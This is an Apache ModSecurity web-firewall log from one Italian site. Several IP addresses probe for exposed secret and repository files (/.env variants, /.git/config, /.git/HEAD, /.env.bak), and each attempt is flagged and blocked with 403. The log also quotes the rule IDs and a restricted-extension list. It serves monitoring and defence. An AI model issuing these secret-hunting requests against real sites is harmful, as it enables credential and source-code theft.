[Sat Nov 15 11:36:30.557884 2025] [:error] [pid 87619] [client 206.81.12.187:57128] [client 206.81.12.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRhXroaZQlyvYIJBoU0b4wAAAAU"]
[Sat Nov 15 11:36:30.558108 2025] [:error] [pid 87619] [client 206.81.12.187:57128] [client 206.81.12.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRhXroaZQlyvYIJBoU0b4wAAAAU"]
[Sat Nov 15 11:36:30.558262 2025] [:error] [pid 87619] [client 206.81.12.187:57128] [client 206.81.12.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRhXroaZQlyvYIJBoU0b4wAAAAU"]
[Sat Nov 15 11:36:30.851203 2025] [:error] [pid 87651] [client 206.81.12.187:57132] [client 206.81.12.187] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRhXrvP4x2ss1UM2wjEIqgAAAAY"]
[Sat Nov 15 11:36:30.851448 2025] [:error] [pid 87651] [client 206.81.12.187:57132] [client 206.81.12.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRhXrvP4x2ss1UM2wjEIqgAAAAY"]
[Sat Nov 15 11:36:30.851613 2025] [:error] [pid 87651] [client 206.81.12.187:57132] [client 206.81.12.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRhXrvP4x2ss1UM2wjEIqgAAAAY"]
[Sun Nov 16 02:45:59.219460 2025] [:error] [pid 99828] [client 204.76.203.25:42868] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRks17zOrvtEHByiY_rT3gAAAAc"]
[Sun Nov 16 02:45:59.219721 2025] [:error] [pid 99828] [client 204.76.203.25:42868] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRks17zOrvtEHByiY_rT3gAAAAc"]
[Sun Nov 16 02:45:59.219893 2025] [:error] [pid 99828] [client 204.76.203.25:42868] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRks17zOrvtEHByiY_rT3gAAAAc"]
[Sun Nov 16 03:03:14.490790 2025] [:error] [pid 103398] [client 45.148.10.246:53924] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/refs"] [unique_id "aRkw4rczEoTwe_Jf335FOQAAAAA"]
[Sun Nov 16 03:03:14.491059 2025] [:error] [pid 103398] [client 45.148.10.246:53924] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/refs"] [unique_id "aRkw4rczEoTwe_Jf335FOQAAAAA"]
[Sun Nov 16 03:03:14.491234 2025] [:error] [pid 103398] [client 45.148.10.246:53924] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/refs"] [unique_id "aRkw4rczEoTwe_Jf335FOQAAAAA"]
[Sun Nov 16 03:03:14.491757 2025] [:error] [pid 103399] [client 45.148.10.246:53906] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/exclude"] [unique_id "aRkw4mi5HgwUxagZ6y7LEgAAAAE"]
[Sun Nov 16 03:03:14.492012 2025] [:error] [pid 103399] [client 45.148.10.246:53906] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/exclude"] [unique_id "aRkw4mi5HgwUxagZ6y7LEgAAAAE"]
[Sun Nov 16 03:03:14.492169 2025] [:error] [pid 103399] [client 45.148.10.246:53906] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/info/exclude"] [unique_id "aRkw4mi5HgwUxagZ6y7LEgAAAAE"]
[Sun Nov 16 03:03:14.492782 2025] [:error] [pid 103401] [client 45.148.10.246:53922] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRkw4r5rejGDIGJeuSGFoAAAAAM"]
[Sun Nov 16 03:03:14.492950 2025] [:error] [pid 103401] [client 45.148.10.246:53922] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRkw4r5rejGDIGJeuSGFoAAAAAM"]
[Sun Nov 16 03:03:14.493009 2025] [:error] [pid 103400] [client 45.148.10.246:53902] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRkw4jNSkdMAuXBkjk7iCgAAAAI"]
[Sun Nov 16 03:03:14.493096 2025] [:error] [pid 103401] [client 45.148.10.246:53922] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRkw4r5rejGDIGJeuSGFoAAAAAM"]
[Sun Nov 16 03:03:14.493203 2025] [:error] [pid 103400] [client 45.148.10.246:53902] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRkw4jNSkdMAuXBkjk7iCgAAAAI"]
[Sun Nov 16 03:03:14.493363 2025] [:error] [pid 103400] [client 45.148.10.246:53902] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/ORIG_HEAD"] [unique_id "aRkw4jNSkdMAuXBkjk7iCgAAAAI"]
[Sun Nov 16 03:03:14.494673 2025] [:error] [pid 103402] [client 45.148.10.246:53886] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRkw4lUTJuGd1tZl6jZ_gQAAAAQ"]
[Sun Nov 16 03:03:14.494829 2025] [:error] [pid 103402] [client 45.148.10.246:53886] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRkw4lUTJuGd1tZl6jZ_gQAAAAQ"]
[Sun Nov 16 03:03:14.494974 2025] [:error] [pid 103402] [client 45.148.10.246:53886] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/index"] [unique_id "aRkw4lUTJuGd1tZl6jZ_gQAAAAQ"]
[Sun Nov 16 04:19:32.931474 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlCxFUTJuGd1tZl6jZ_iQAAAAQ"]
[Sun Nov 16 04:19:32.931894 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlCxFUTJuGd1tZl6jZ_iQAAAAQ"]
[Sun Nov 16 04:19:32.932061 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRlCxFUTJuGd1tZl6jZ_iQAAAAQ"]
[Sun Nov 16 04:19:33.332368 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlCxVUTJuGd1tZl6jZ_igAAAAQ"]
[Sun Nov 16 04:19:33.332756 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlCxVUTJuGd1tZl6jZ_igAAAAQ"]
[Sun Nov 16 04:19:33.332925 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlCxVUTJuGd1tZl6jZ_igAAAAQ"]
[Sun Nov 16 04:19:33.803213 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRlCxVUTJuGd1tZl6jZ_iwAAAAQ"]
[Sun Nov 16 04:19:33.803637 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRlCxVUTJuGd1tZl6jZ_iwAAAAQ"]
[Sun Nov 16 04:19:33.803870 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRlCxVUTJuGd1tZl6jZ_iwAAAAQ"]
[Sun Nov 16 04:19:34.227104 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jAAAAAQ"]
[Sun Nov 16 04:19:34.227515 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jAAAAAQ"]
[Sun Nov 16 04:19:34.227716 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jAAAAAQ"]
[Sun Nov 16 04:19:34.955176 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jQAAAAQ"]
[Sun Nov 16 04:19:34.955562 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jQAAAAQ"]
[Sun Nov 16 04:19:34.955766 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRlCxlUTJuGd1tZl6jZ_jQAAAAQ"]
[Sun Nov 16 04:19:35.589007 2025] [:error] [pid 103402] [client 195.178.110.201:53538] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRlCx1UTJuGd1tZl6jZ_jgAAAAQ"]
